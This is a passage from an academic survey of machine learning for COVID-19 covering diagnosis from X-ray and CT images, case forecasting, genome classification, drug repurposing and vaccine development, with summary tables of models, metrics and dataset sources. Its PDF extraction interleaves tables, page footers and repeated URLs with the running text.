from the clinical groups The approach has the potential to remove the subjectivity in the initial evaluation of COVID-19 findings as well as follow up pulmonary Li et al. (2020b) CNN Sensitivity:87% The automated framework that differentiates COVID- 19 from pneumonia Automated the COVID-19 testing process, reduces the testing time and fatigue. Specificity:92% AUC: 95% Liu et al. (2020a) P-CNN Sensitivity: 100% Diagnose COVID-19 with limited data and present new probabilistic Grad- CAM salient map Limited amount of data can be used for the COVID-19 diagnoses, and it is interpretable. Precision: 76.9% Ozturk et al. (2020) CNN Sensitivity: 85.35% Improve efficiency and automate the COVID-19 screening process Automate the process of COVID-19 diagnoses to reduce fatigueSpecificity: 92.18% Accuracy: 87.02% Salman et al. (2020) CNN Sensitivity: 100% Automated COVID-19 screening process Reduces diagnostic time Specificity: 100% Accuracy: 100% Singh et al. (2020) MODE based CNN Sensitivity: > 90% Diagnose COVID-19 with better accuracy than the competitive models The proposal is beneficial to COVID-19 real-time classificationSpecificity: > 90% Toğaçar, Ergen & Cömert (2020) CNN-SVM Overall accuracy: 99.27% Contributed to the efficient detection of COVID-19 Automated detection of COVID-19 patient Ucar & Korkmaz (2020) Bayesian-based SqueezeNet Accuracy: 100% Presents alternative rapid COVID-19 diagnostic tool based on deep Bayes- SqueezeNet It will be of benefit to healthcare professionals in diagnosing COVID-19 efficiently. Specificity: 99.67% Wu et al. (2020) ResNet50 Accuracy: 0.819 Provide COVID-19 diagnosis from multiple view Reduce the workload of a radiologist by offering fast and accurate COVID-19 diagnosis Sensitivity: 0.760 Specificity: 0.811 Loey, Smarandache & Khalifa (2020) Googlenet, Alexnet and RestNet18 Googlenet, Alexnet and Googlenet scored 80.6%, 85.2% and 100% in the 4, 3 and 2 classes classification problems Generate sufficient COVID- 19 data to improve COVID- 19 diagnosis Early detection of COVID-19 and reduce the workload of radiologist Chiroma et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.313 14/45 http://dx.doi.org/10.7717/peerj-cs.313 https://peerj.com/computer-science/ learning (SEL), on COVID-19 datasets collected in Brazil to predict confirmed cases for 1, 3, and 6 days ahead. They found that SVR outperformed RIDGE, ARIMA, RF, CUBIST, and SEL. The study can help monitor COVID-19 cases in Brazil and facilitate critical decisions on COVID-19. Tummers et al. (2020) applied k-means to cluster documents based on COVID-19 and people with intellectual disability. Table 4 summarizes the studies on COVID-19 decision support system. COVID-19 from genome sequences The protein sequence of COVID-19 can be collected to apply the machine learning approach for the prediction of COVID-19 (Qiang et al., 2020). For example, Qiang et al. (2020) predicted the infection risk of non-human origin of COVID-19 from spike protein for prompt alarm using RF. The genome data comprised of non-human COVID-19 origin (positive) and human COVID-19 origin (negative). RF was applied for the training to predict non-human COVID-19 origin. The results showed that the RF model achieved high accuracy in predicting non-human COVID-19 origin. The study can be used in COVID-19 genome mutation surveillance and exploring evolutionary dynamics in a simple, fast, and large-scale manner. Randhawa et al. (2020) combined decision tree and digital signal processing (DT–DSP) to detect the COVID-19 virus genome and identified the signature of intrinsic COVID-19 viruses’ genome. DT–DSP was applied to explore over 5,000 viral genome sequences with 61.8 million by the 29 viral sequences of COVID-19. The result obtained supported the bat origin of COVID-19 and successfully classified COVID-19 with 100% accuracy as sub-genus Sarbecovirus within Betacoronavirus. DT–DSP is a reliable real-time alternative taxonomic classification. Table 5 summarizes the studies. Table 3 (continued) Reference Algorithm Performance Contribution Benefit Hurt, Kligerman & Hsiao (2020) Deep learning Not provided Improve the detection COVID-19 from X-ray Early detection of COVID-19 Jiang et al. (2020) Machine learning algorithm Accuracy: 70–80% Detect COVID-19 severity in a patient at the initial presentation Help in optimal utilization of scarce resources to cope with COVID-19 Liu et al. (2020a) Logistic regression ROC: 0.93 Applied CT quantification of pneumonia to predict progression to COVID-19 severity provide a prognostic indicator for COVID-19 clinical managementConfidence interval: 95% Mei et al. (2020) Deep ensemble algorithm ROC: 0.92 Predict COVID-19 with both image and none image clinical information The ensemble diagnostic tool can detect COVID-19 patients rapidlyAccuracy: 68% Sensitivity: 84.3% Specificity: 82.8% Yang et al. (2020a) Densely connected convolutional networks Accuracy: 92% Detect COVID-19 from CT scan via densely connected convolutional networks Reduce radiologist workload Sensitivity: 97% Specificity: 87% Chiroma et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.313 15/45 http://dx.doi.org/10.7717/peerj-cs.313 https://peerj.com/computer-science/ COVID-19 drug discovery Machine learning and AI provide approaches for the speedy processing of a large amount of collected medical data generated daily as well as the extraction of new information from transversely different applications. In the prediction of disease, a viral mutation can be forecast before the emergence of new strains. It also allows the prediction of new structure and availability of broader structural information. Efficient drug repurposing can be achieved in mining existing data. The stages for the development of COVID-19 drugs are as follows (Park et al., 2020): Disease prediction: The prediction of future-generation viral Table 5 The summary of detecting COVID-19 from genome sequence via an algorithm. Reference Algorithm Performance Contribution Benefit Qiang et al. (2020) Random Forest Accuracy: 98.18% Able to detect none human COVID-19 origin from spike protein used in COVID-19 genome mutation surveillanceMathew Correlation Coefficient: 0.9638 Randhawa et al. (2020) Decision Tree Accuracy: 100% Successfully used intrinsic viral genomic signatures to classify COVID-19 with 100% accuracy The DT-DSP is a reliable real-time alternative for the classification of taxonomic Table 4 Summary of the adoption of machine learning approaches in building COVID-19 decision support systems. Reference Algorithm Performance Contribution Benefit Ayyoubzadeh et al. (2020) LSTM & Linear regression LSTM: RMSE 27.187 Predict COVID-19 positive cases in Iran The algorithm can predict the trend of the COVID-19 pandemic in Iran, which can help policymakers to plan for the allocation of medical resources Linear Regression: RMSE 7.562 Chimmula & Zhang (2020) LSTM RMSE: 34.83 Forecast COVID-19 transmission in Canada Help decision-makers in monitoring and curtailing future transmission of COVID-19 in Canada Accuracy: 92.6% Liu et al. (2020b) ANN Not Applicable Estimated the trend of COVID- 19 in China Help policymakers and health officials attend to the need of other diseases during the COVID-19 pandemic Ribeiro et al. (2020) Support vector regression MAE: 79.17 Provide future COVID-19 confirmed cases in brazil monitoring COVID-19 cases in Brazil and help decision-makers in taken critical decision about COVID-19 Tiwari, Kumar & Guleria (2020) Machine learning algorithm (not specified) MAE & RSME— graphical The predicted peak period of COVID-19 in India Help India policymakers decide on COVID-19 to mitigate its spread Tuli et al. (2020) Machine learning algorithm (not specified) MSE: 9.32E+06 Provide real life COVID-19 predictions Government and citizens can use the results for proactive measures to fight COVID-19 Vaid, Cakan & Bhandari (2020) Machine learning algorithm (not specified) Not reported Predict Potential COVID-19 infections Policymakers in North America can use the projection to curtail the effect of COVID-19 pandemic Yang et al. (2020b) LSTM Confidence Interval: 95% Predict COVID-19 trend in China Authorities in China to decide to control the COVID-19 pandemic Pirouz et al. (2020) Group method of data handling neural network Accuracy: 85.7% Predict COVID-19 pandemic based on weather condition Help in managing COVID-19 pandemic Chiroma et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.313 16/45 http://dx.doi.org/10.7717/peerj-cs.313 https://peerj.com/computer-science/ mutation can be accomplished by AI and machine learning approaches. Structural analysis: The COVID-19 structure and primary functional site are characterized. Drug repurposing: For insight into new disease treatment, existing drug data are mined. New drug development: Efficiencies across the entire pharmaceutical life cycle are achieved by rapid processing. Ke et al. (2020) applied machine learning to identify drugs already marketed that can treat COVID-19. They compiled two independent datasets to develop two machine learning models. The first model was built based on drugs that are known to have antiviral activities. The second model was built based on 3C-like protease inhibitors. The database of market-approved drugs was screened by the machine learning model to predict the drugs with potential antiviral activities. The drugs predicted to have antiviral activities were evaluated against the antiviral activities by a cell-based feline infectious peritonitis virus duplication assay. The assay results were the machine learning model feedbacks for incremental learning of the model. Finally, 80 marketed drugs were identified to have potential antiviral activities. Old drugs with antiviral activities against feline infectious peritonitis COVID-19 were found. COVID-19 vaccine development Typically, the immune system is prepared to elicit antibody or cell-mediated responses against a pathogen by a vaccine that protects the body from infectious diseases. Immunogenicity is the vaccine ability to the response. For a long-time, effective immunity, the vaccine has to properly activate innate, adaptive responses (Klein, Jedlicka & Pekosz, 2010). The following phases should be adopted to develop a COVID-19 vaccine (Gonzalez- Dias et al., 2020): Dataset preparation: The quality of the data to be used influences the machine learning algorithm. Thus, preparing quality data before feeding into the algorithm is sacrosanct. Data come in different sizes ranging from small, medium, and large. Data quality must be ensured because a quality immune response is needed. The reliability of the data needs to be guaranteed by ensuring that the serological assay is well qualified in case it is not validated based on known parameters (linearity, specificity, LLOQ, ruggedness, LLOD, ULOQ, and reproducibility). Vaccines and relevant genes: In vaccinology, the machine learning algorithm is trained to discover the combination of genes and the best vaccines parameters. The data for the training are extracted from omics experiment, which will be used to obtain the required combination. Feature selection is performed to find the best representative of the discriminatory gene signatures. Then, the new vaccines are predicted. The three main feature selection methods are filter, wrapper, and embedded. Machine learning algorithm selection: This task is not a straightforward task because many factors must be considered before selecting the appropriate algorithm for the modeling. The choice of the algorithm depends on the nature of the data, and the options include supervised, unsupervised, and semi-supervised learning. For instance, if the data have no output, then unsupervised learning algorithm, for example, k–the nearest neighbor is the possible candidate algorithm for the modeling but is not guaranteed. Many algorithms have to be tested on solving the Chiroma et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.313 17/45 http://dx.doi.org/10.7717/peerj-cs.313 https://peerj.com/computer-science/ same problem before the algorithm that produces the best output is selected. Model testing: The performance of the model is tested. The data are partitioned into training and testing; the former is used for training the algorithm, and the latter is used for evaluating the performance of the model using several performance parameters, for example, MSE, accuracy, and F-measure (Gonzalez-Dias et al., 2020). The application of a machine learning algorithm to sift through trillions of compounds of the vaccine adjuvants can shorten the vaccine development time. The machine learning algorithm can be used for screening compounds for a potential adjuvant candidate for the SARS-CoV-2 vaccine (Ahuja, Reddy & Marques, 2020). COVID-19 DATASETS Data sources Ahuja, Reddy & Marques (2020) reported that COVID-19 data are now growing. In this section, we present the sources of COVID-19 data to the machine learning community. Given the novelty of the virus, centralizing the collection of sources of data will help researchers access different types of COVID-19-related data and provide them opportunities to work on a different aspect of COVID-19 that may lead to novel discoveries. Table 6 has five columns, where the first, second, third, fourth, and fifth columns represent the reference, data, owners, source/accessibility, and remarks, respectively. We only present the projects that revealed and fully discussed their data sources. COVID-19 on CXR and CT scan images In this section, we discuss the diagnosis of COVID-19 based on X-ray and CT scan images because of their high value in COVID-19 screening. Table 6 shows that researchers heavily utilize X-rays and CT scans in developing a machine-learning-based COVID-19 diagnosis tool. Guan et al. (2020) and Wong et al. (2020) found that portable chest radiography (CXR) has a sensitivity of 59% for the initial detection of COVID-19-related abnormalities. Radiographic abnormalities, when present, mirror those of CT, with a bilateral lower zone, a peripherally predominant consolidation, and hazy opacities (World Health Organization, 2020). The radiological findings of COVID-19 on CXR are those of atypical pneumonia or organizing pneumonia (Kooraki et al., 2020). Although chest CT scans are reportedly less sensitive than CXRs, chest radiography remains the first-line imaging modality of choice used for patients with suspected COVID-19 infection (Hui et al., 2020) because it is cheap and readily available, and can easily be cleaned. For ease of decontamination, the use of portable radiography units is preferred. Chest radiographs are often normal in early or mild disease. According to a recent study of patients with COVID-19 requiring hospitalization, 69% had an abnormal chest radiograph at the initial time of admission, and 80% had radiographic abnormalities sometime during hospitalization. The findings are reported to be most extensive about 10–12 days after symptom onset. The most frequent radiographic findings are airspace opacities, whether described as consolidation or less commonly, ground-glass opacity (GGO) (Wong et al., 2020). The distribution is most often bilateral, peripheral, and lower zone predominant Chiroma et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.313 18/45 http://dx.doi.org/10.7717/peerj-cs.313 https://peerj.com/computer-science/ (Rodrigues et al., 2020). Unlike parenchymal abnormalities, pleural effusion is rare (3%) (Wong et al., 2020). According to the Center for Disease Control (CDC), even if a chest CT or X-ray suggests COVID-19, viral testing is the only specific method for diagnosis. Radiography’s sensitivity was reported at only 25% for detection of lung opacities related to COVID-19, among 20 patients seen in South Korea with a reported specificity of 90% (Wen et al., 2020). The X-ray image should be considered a useful tool for detecting COVID-19 which is challenging the healthcare system due to the overflow of patients. As the COVID-19 pandemic grinds on, clinicians on the front lines may increasingly turn to radiography (Casey, 2020). The most frequent findings are airspace opacities, whether described as consolidation or less commonly, GGO. The distribution is most often bilateral, peripheral, and lower zone predominant (Wong et al., 2020). Much of the imaging focus is on CT. In February 2020, Chinese studies revealed that chest CT achieved a higher sensitivity for the diagnosis of COVID-19 compared with initial RT–PCR tests of pharyngeal swab samples (Ai et al., 2020; Fang et al., 2020). Subsequently, the National Health Commission of China briefly accepted chest CT findings of viral pneumonia as a diagnostic tool for detecting COVID-19 infection (Yuen et al., 2020; Zu et al., 2020). The typical appearance of COVID-19 on chest CT consists of multi-lobar, bilateral, predominantly lower lung zone, rounded GGOs, with or without consolidation, in a mostly peripheral distribution. However, such findings are nonspecific; the differential diagnosis includes organizing pneumonia and other infections, drug reactions, and other inflammatory processes. Consequently, using CT to screen for COVID-19 may result in false positives. Moreover, the presence of abnormalities not typically associated with COVID-19 infection, including pure consolidation, cavitation, thoracic lymphadenopathy, and nodules suggests a different etiology (Bernheim et al., 2020). COVID-19-related chest CT abnormalities are more likely to appear after symptom onset, but they may also precede clinical symptoms. In a retrospective study by Bernheim et al. (2020), 44% of patients presenting within 2 days of symptom onset had an abnormal chest CT, while 91% presenting within 3–5 days and 96% presenting after 6 days had abnormal chest CTs. Shi et al. (2020) found GGOs in 14 of 15 asymptomatic healthcare workers with confirmed COVID-19. Similarly, 54% of 82 asymptomatic passengers with COVID-19 on the Diamond Princess cruise ship had findings of viral pneumonia on the CT (Inui et al., 2020). In a prospective study by Wang et al. (2020b) pure GGOs were the only abnormalities seen prior to symptom onset. Subsequently, 28% of patients developed superimposed septal thickening 6–11 days after symptom onset. Architectural distortion evolving from GGOs appeared later in the disease course, likely reflecting organizing pneumonia and early fibrosis. Long-term follow-up imaging is also needed to determine the sequelae of SARS-CoV-2 infection. In a retrospective study by Das et al. (2017), 33% of patients who recovered from MERS-CoV developed pulmonary fibrosis; a similar outcome following COVID-19 is likely. Lung ultrasound offers a low-cost, point-of-care evaluation of the lung parenchyma without ionizing radiation. The modality is especially useful in resource-limited settings (Stewart et al., 2020). Peng, Wang & Zhang (2020) found that Chiroma et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.313 19/45 http://dx.doi.org/10.7717/peerj-cs.313 https://peerj.com/computer-science/ Table 6 Summary of COVID-19 data sources and accessibility. Reference Data Owners Source/Accessibility Remarks Apostolopoulos & Mpesiana (2020), Ozturk et al. (2020), Salman et al. (2020), Toğaçar, Ergen & Cömert (2020), Ucar & Korkmaz (2020) and Loey, Smarandache & Khalifa (2020) X-Ray Cohen https://github.com/ ieee8023/covid- chestxray-dataset A project with a collection of X-rays images Apostolopoulos & Mpesiana (2020) X-Ray Kaggle https://www.kaggle. com/andrewmvd/ convid19-X-rays Dataset_1: 224 images with Covid-19, 700 images with common bacterial pneumonia, and 504 normal images condition Dataset_2: 224 cases of Covid-19, 504 healthy instances, and 714 has both bacterial and viral pneumonia Ardakani et al. (2020) CT scan Ardakani et al. (2020) 16-MDCT scanner (Alexion, Toshiba Medical System, Japan) The data contained 1020 CT slices from 108 patients confirmed COVID-19 and 86 patients without COVID-19 Ayyoubzadeh et al. (2020) and Vaid, Cakan & Bhandari (2020) Time series Worldometer https://www. worldometers.info/ coronavirus/ The daily new COVID-19 cases from 02/ 15, 2020, to 03/18/2020 in Iran. Dataset features: previous day’s search trends, previous day cases, and Output: new cases of the current day Barbosa & Fernandes (2020) Genome Barbosa & Fernandes (2020) https://data.mendeley. com/datasets/ nvk5bf3m2f/1 The data is chaos game representation of SARS-CoV-2 containing both the raw and processed data with 100 instances of SARS-CoV-2 genome Butt et al. (2020) CT scan Butt et al. (2020) Butt et al. (2020) The data comprised of 618 CT scan samples including 219 from 110 COVID-19 patients Chimmula & Zhang (2020) Time series Johns Hopkins University and Canadian Health authority Chimmula & Zhang (2020) The data is available in time series: date, month and year up to 31/04/20 Huang et al. (2020b) CT scan Huang et al. (2020b) Huang et al. (2020b) 126 COVID-19 patients that underwent a CT chest scan from 1/1/2020 to 3/2/ 2020 Li et al. (2020b) CT scan Li et al. (2020b) Li et al. (2020b) Data from 3,322 patients comprising of 4356 chest CT scans. Data collection period from 16/08/2016 to 17/02/2020 Liu et al. (2020a) Time series 1. Tencent news Real COVID-19 reporting: https:// news.qq.com/zt2020/ page/feiyan.htm? ADTAG=area 1. COVID-19 time-series data including locations confirmed cases, deaths, recovery cases, and new diagnosed cases 2. Baidu Baidu: http://qianxi. baidu.com 2. Baidu is an open-source for big data project that provides visualization of population migration Oh, Park & Ye (2020) X-ray Society of Radiological Technology Oh, Park & Ye (2020) Segmentation network dataset with a total of 247 posteroanterior chest radiographs Chiroma et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.313 20/45 https://github.com/ieee8023/covid-chestxray-dataset https://github.com/ieee8023/covid-chestxray-dataset https://github.com/ieee8023/covid-chestxray-dataset https://www.kaggle.com/andrewmvd/convid19-X-rays https://www.kaggle.com/andrewmvd/convid19-X-rays https://www.kaggle.com/andrewmvd/convid19-X-rays https://www.worldometers.info/coronavirus/ https://www.worldometers.info/coronavirus/ https://www.worldometers.info/coronavirus/ https://data.mendeley.com/datasets/nvk5bf3m2f/1 https://data.mendeley.com/datasets/nvk5bf3m2f/1 https://data.mendeley.com/datasets/nvk5bf3m2f/1 https://news.qq.com/zt2020/page/feiyan.htm?ADTAG=area https://news.qq.com/zt2020/page/feiyan.htm?ADTAG=area https://news.qq.com/zt2020/page/feiyan.htm?ADTAG=area https://news.qq.com/zt2020/page/feiyan.htm?ADTAG=area http://qianxi.baidu.com http://qianxi.baidu.com http://dx.doi.org/10.7717/peerj-cs.313 https://peerj.com/computer-science/ sonographic findings in patients with COVID-19 correlated with typical CT abnormalities. The predominantly peripheral distribution of lung involvement facilitated sonographic visibility. Characteristic findings included thickened, irregular pleural lines, B lines Table 6 (continued) Reference Data Owners Source/Accessibility Remarks Qiang et al. (2020) Protein sequence China national genomic data center https://bigd.big.ac.cn/ ncov The database has an extensive protein sequence Randhawa et al. (2020) Genome National Center for Biotechnology Information https://sourceforge.net/ projects/mldsp-gui/ files/ COVID19Dataset The database has genome dataset with thousands of bp Ribeiro et al. (2020) Time series Ribeiro et al. (2020) https://brasil.io/api/ dataset/covid19/caso/ data/?place_ type=state Daily COVID-19 reports on confirmed cases from different states in Brazil Singh et al. (2020) CT scan Singh et al. (2020) Singh et al. (2020) Chest CT scan images from ICU Tiwari, Kumar & Guleria (2020) Time series Center for Systems Science and Engineering (CSSE) at Johns Hopkins University (JHU). https://www.kaggle. com/ sudalairajkumar/ novel-corona-virus- 2019-dataset Confirmed COVID-19 cases, recovered cases, and death cases from China Tuli et al. (2020) Time series Hannah Ritchie https://ourworldindata. org/coronavirus- source-data The dataset is the Our World in Data provided by Hannah Ritchie Wu et al. (2020) CT scan Wu et al. (2020) Wu et al. (2020) The CT scan images of 495 patients were collected from three hospitals in China Yang et al. (2020b) Time series 1. National health commission of China 1. http://www.nhc.gov. cn/xcs/yqtb/list_ gzbd.shtml SARS and COVID-19 datasets 2. https://qianxi.baidu. com/ 2. Baidu 3. http://news.sohu. com/57/26/ subject206252657. shtml 3. SOHU Hurt, Kligerman & Hsiao (2020) X-ray Hurt, Kligerman & Hsiao (2020) Hurt, Kligerman & Hsiao (2020) Chest X-ray images from China and America Jiang et al. (2020) CT scan & clinical characteristics Jiang et al. (2020) Jiang et al. (2020) CT scan images and clinical characteristics Liu et al. (2020a) CT scan Liu et al. (2020a) Liu et al. (2020a) Chest CT scan that was performed using a 64-slice CT scanner without contrast agents. Mei et al. (2020) CT scan and clinical information Mei et al. (2020) Mei et al. (2020) Both clinical information and chest CT scan images were collected for the study Pirouz et al. (2020) Time series Pirouz et al. (2020) Pirouz et al. (2020) Environmental and urban data Yang et al. (2020a) CT scan Yang et al. (2020a) Yang et al. (2020a) CT scan images from a hospital in china Chiroma et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.313 21/45 https://bigd.big.ac.cn/ncov https://bigd.big.ac.cn/ncov https://sourceforge.net/projects/mldsp-gui/files/COVID19Dataset https://sourceforge.net/projects/mldsp-gui/files/COVID19Dataset https://sourceforge.net/projects/mldsp-gui/files/COVID19Dataset https://sourceforge.net/projects/mldsp-gui/files/COVID19Dataset https://brasil.io/api/dataset/covid19/caso/data/?place_type=state https://brasil.io/api/dataset/covid19/caso/data/?place_type=state https://brasil.io/api/dataset/covid19/caso/data/?place_type=state https://brasil.io/api/dataset/covid19/caso/data/?place_type=state https://www.kaggle.com/sudalairajkumar/novel-corona-virus-2019-dataset https://www.kaggle.com/sudalairajkumar/novel-corona-virus-2019-dataset https://www.kaggle.com/sudalairajkumar/novel-corona-virus-2019-dataset https://www.kaggle.com/sudalairajkumar/novel-corona-virus-2019-dataset https://www.kaggle.com/sudalairajkumar/novel-corona-virus-2019-dataset https://ourworldindata.org/coronavirus-source-data https://ourworldindata.org/coronavirus-source-data https://ourworldindata.org/coronavirus-source-data http://www.nhc.gov.cn/xcs/yqtb/list_gzbd.shtml http://www.nhc.gov.cn/xcs/yqtb/list_gzbd.shtml http://www.nhc.gov.cn/xcs/yqtb/list_gzbd.shtml https://qianxi.baidu.com/ https://qianxi.baidu.com/ http://news.sohu.com/57/26/subject206252657.shtml http://news.sohu.com/57/26/subject206252657.shtml http://news.sohu.com/57/26/subject206252657.shtml http://news.sohu.com/57/26/subject206252657.shtml http://dx.doi.org/10.7717/peerj-cs.313 https://peerj.com/computer-science/ (edema), and eventual appearance of A lines (air) during recovery. Peng, Wang & Zhang (2020) suggested that ultrasound may be useful in recruitment maneuver monitoring and guide prone positioning. Chest CT is an indispensable tool for the early screening and diagnosis of suspected COVID-19 infection in patients. Previous studies confirmed that the majority of patients infected with COVID-19 exhibited common chest CT characteristics, including GGOs and consolidation, which reflect lesions affecting multiple lobes or infections in the bilateral lung parenchyma. Increasing evidence suggests that these chest CT characteristics can be used to screen suspected patients and serve as a diagnostic tool for COVID-19- caused acute respiratory diseases (ARDS) (Xu et al., 2020). These findings have led to the modification of the diagnosis and treatment protocols of SARS-CoV-2-caused pneumonia to include patients with characteristic pneumonia features on chest CT but negative RT–PCR results in severe epidemic areas such as Wuhan City and Hubei Province (Liu et al., 2020a). Patients with negative RT–PCR but positive CT findings should be isolated or quarantined to prevent clustered or wide-spread infections. The critical role of CT in the early detection and diagnosis of COVID-19 becomes more publicly acceptable. However, several studies also reported that a proportion of RTPCR-positive patients, including several severe cases, had initially normal CXR or CT findings (Fang et al., 2020). According to the diagnostic criteria of COVID-19, patients might have no or atypical radiological manifestations even at the mild or moderate stages because several lesions are easily missed in the low-density resolution of CXR, suggesting that chest CT may be a better modality with a lower false-negative rate. Another possible explanation is that in several patients, the targeted organ of COVID-19 may not be the lung. Multiple-organ dysfunctions, including ARDS, acute cardiac injury, hepatic injury, and kidney injury, have been reported during COVID-19 infection (Huang et al., 2020a). Studies also reported the chest CT appearances in patients with COVID-19 after treatment, suggesting its critical role in treatment evaluation and follow up. For example, a study investigated the change in chest CT findings associated with COVID-19 at different time points during the infection course (Pan et al., 2020). The results showed that most apparent abnormalities on the chest CT were still observable for 10 days but disappeared at 14 days after the initial onset of symptoms. Unexpectedly, a case report showed pre- and post-treatment chest CT findings of a 46-year-old woman whose RT–PCR result became negative, while pulmonary lesions were reversal (Duan & Qin, 2020). Deep learning applications for COVID-19 Singh et al. (2020) developed a deep CNN, which was applied in the automated diagnosis and analysis of COVID-19 in infected patients to save the time and energy of medical professionals. They tuned and used the hyperparameters of CNN by using multi-objective adaptive differential evolution (MADE). Further in the course of their experiments which were extensively carried out, they used several benchmark COVID-19 datasets. The data used to evaluate the performance of their proposed model were divided into training and testing datasets. The training sets were used to build the COVID-19 Chiroma et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.313 22/45 http://dx.doi.org/10.7717/peerj-cs.313 https://peerj.com/computer-science/ classification model. Then, the hyperparameters of the CNN model were optimized on the training sets by using the MADE-based optimization approach. The results from the comparative analysis showed that their proposed method outperformed existing machine learning models such as CNN, GA-based CNN, and PSO-based CNN in terms of different metrics (including F-measure, sensitivity, specificity, and Kappa statistics). Jaiswal et al. (2020) applied deep learning models for the diagnosis and detection of COVID-19, and it was called DenseNet201-based deep transfer learning (DTL). The authors used these pre-trained deep learning architecture as automation tools to detect and diagnose COVID-19 in chest CT scans. The DTL model was used to classify patients as COVID-19 positive (+ve) or COVID-19 negative (−ve). The proposed model was also utilized to extract several features by adopting its own learned weights on the ImageNet dataset along with a convolutional neural structure. Extensive analysis of the experiments showed that the proposed DTL-based COVID-19 model was superior to competing methods. The proposed DenseNet201 model achieved a 97% accuracy compared with other models and could serve as an alternative to other COVID-19 testing kits. Li et al. (2020c) developed a fully automated AI system to assess the severity of COVID-19 and its progression quantitatively using thick-section chest CT images. The AI system was implemented to partition and quantify the COVID-19-infected lung regions on thick-section chest CT images automatically. The data generated from the automatically segmented lung abnormalities were compared with those of the manually segmented abnormalities of two professional radiologists by using the Dice coefficient on a randomly selected subset of 30 CT scans. During manual and automatic comparisons, two biomarker images were automatically computed, namely, the portion of infection (POI) and the average infection HU (iHU), which were then used to assess the severity and progression of the viral disease. The performance of the assessments was then compared with patients’ status of diagnosis reports, and key phrases were extracted from the radiology reports using the area under the receiver’s operating characteristic curve (AUC) and Cohen’s kappa statistics. Further in their study, the POI was the only computed imaging biomarker that was effective enough to show high sensitivity and specificity for differentiating the groups with severe COVID-19 and groups with non-severe COVID-19. The iHU reflected the progress rate of the infection but was affected by several irrelevant factors such as the construction slice thickness and the respiration status. The results of the analysis revealed that the proposed deep-learning-based AI system accurately quantified the COVID-19 strains associated with the lung abnormalities, and assessed the virus’ severity and its corresponding progression. Their results also showed that the deep learning-based tool can help cardiologists in the diagnosis and follow-up treatment for patients with COVID-19 based on the CT scans. Singh, Kumar & Kaur (2020) used a CNN to classify patients with COVID-19 as COVID-19 +ve or COVID-19 −ve. The initial parameters of CNN were tuned by using MODE. The authors adopted the mutation, crossover, and selection operations of the differential evolution (DE) algorithm. They extracted the chest CT dataset of COVID-19- infected patients and decomposed them into training and testing groups. The proposed MODE-based CNN and competitive classification models were then applied to the Chiroma et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.313 23/45 http://dx.doi.org/10.7717/peerj-cs.313 https://peerj.com/computer-science/ training dataset. They compared the competitive and proposed classification models by considering different fractions of the training and testing datasets. The extensive analysis showed that the proposed model classified the chest CT images at reasonable accuracy rates compared with other competing models, such as ANN, ANFIS, and CNS. The proposed model was also useful for COVID-19 disease classification from chest CT images. Asif & Wenhui (2020) implemented a model that automatically detected COVID-19 pneumonia in patients using digital CXR images while maximizing the accuracy in detection by using deep convolutional neural networks (DCNN). Their model named DCNN-based model Inception V3 with transfer learning detected COVID-19 infection in patients using CXR radiographs. The proposed DCNN also provided insights on how deep transfer learning methods were used for the early detection of the disease. The experimental results showed that the proposed DCNN model achieved high accuracy. The proposed model also exhibited excellent performance in classifying COVID-19 pneumonia by effectively training itself from a comparatively lower collection of images. Hu et al. (2020) implemented a weak supervised deep learning model for detecting and classifying COVID-19 infection from CT images. The proposed model minimized the requirements of manual labeling of CT images and accurately detected the viral disease. The model could distinguish positive COVID-19 cases from non-positive COVID-19 cases by using COVID-19 samples from retrospectively extracted CT images from multiple scanners and centers. The proposed method accurately pinpointed the exact position of the lesions (inflammations) caused by the viral COVID-19 and potentially provided advice on the patient’s severity to guide the disease triage and treatment. The experimental results indicated that the proposed model achieved high accuracy, precision, and classification as well as good qualitative visualization for the lesion detections. Ayyoubzadeh et al. (2020) conducted a study to predict the incidence and occurrence of COVID-19 in Iran. The authors obtained data from the Google Trends website (recommender systems) and used linear regression and LSTM models to estimate the number of positive COVID-19 cases from the extracted data. Root mean square error and 10-fold cross-validation were used as performance metrics. The predictions obtained from the Google Trend’s website were not very precise but could be used to build a base for accurate models for more aggregated data. Their study showed that the population (Iranians) focused on the usage of hand sanitizer and handwashing practices with antiseptic as preventive measures against the disease. The authors used specific keywords related to COVID-19 to extract Google search frequencies and used the extracted data to predict the degree of COVID-19 epidemiology in Iran. They suggested future research direction using other data sources such as social media information, people’s contact with the special call center for COVID-19, mass media, environmental and climate factors, and screening registries. Randhawa et al. (2020) integrated supervised machine learning with digital signal processing called MLDSP for genome analyses, which were then augmented by a DT approach to the machine learning component, and a Spearman’s rank correlation coefficient analysis for result validation. The authors identified an intrinsic COVID-19 virus genome signature and used it together with a machine-learning-based alignment-free Chiroma et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.313 24/45 http://dx.doi.org/10.7717/peerj-cs.313 https://peerj.com/computer-science/ approach for an ultra-fast, scalable, and highly accurate classification of the COVID-19 genomes. They also demonstrated how machine learning used intrinsic genomic signature to provide a rapid alignment-free taxonomic classification of novel pathogens. The model accurately classified the COVID-19 virus without having a priori knowledge by simultaneous processing of the geometric space of all relevant viral genomes. Their result analysis supported the hypothesis of a bat origin and classified the COVID-19 virus as Sarbecovirus within Betacoronavirus. Also, their results were obtained through a comprehensive analysis of over 5,000 unique viral sequences through an alignment-free analysis of their 2D genomic signatures, combined with a DT use of supervised machine learning, and confirmed by Spearman’s rank correlation coefficient analyses. Farhat, Sakr & Kilany (2020) reviewed the developments of deep learning applications in medical image analysis which targeted pulmonary imaging and provided insights into contributions to COVID-19. The study covered a survey of various contributions from diverse fields for about 3 years and highlighted various deep learning tasks such as classification, segmentation, and detection as well as different pulmonary pathologies such as airway diseases, lung cancer, COVID-19, and other infections. The study summarized and discussed current state-of-the-art approaches in the research domain, highlighting the challenges, especially given the current situation of COVID-19. First, the authors provided an overview of several medical image modalities, deep learning, and surveys on deep learning in medical imaging, in addition to available datasets for pulmonary medical images. Second, they provided a summarized survey on deep-learning- based applications and methods on pulmonary medical images. Third, they described the 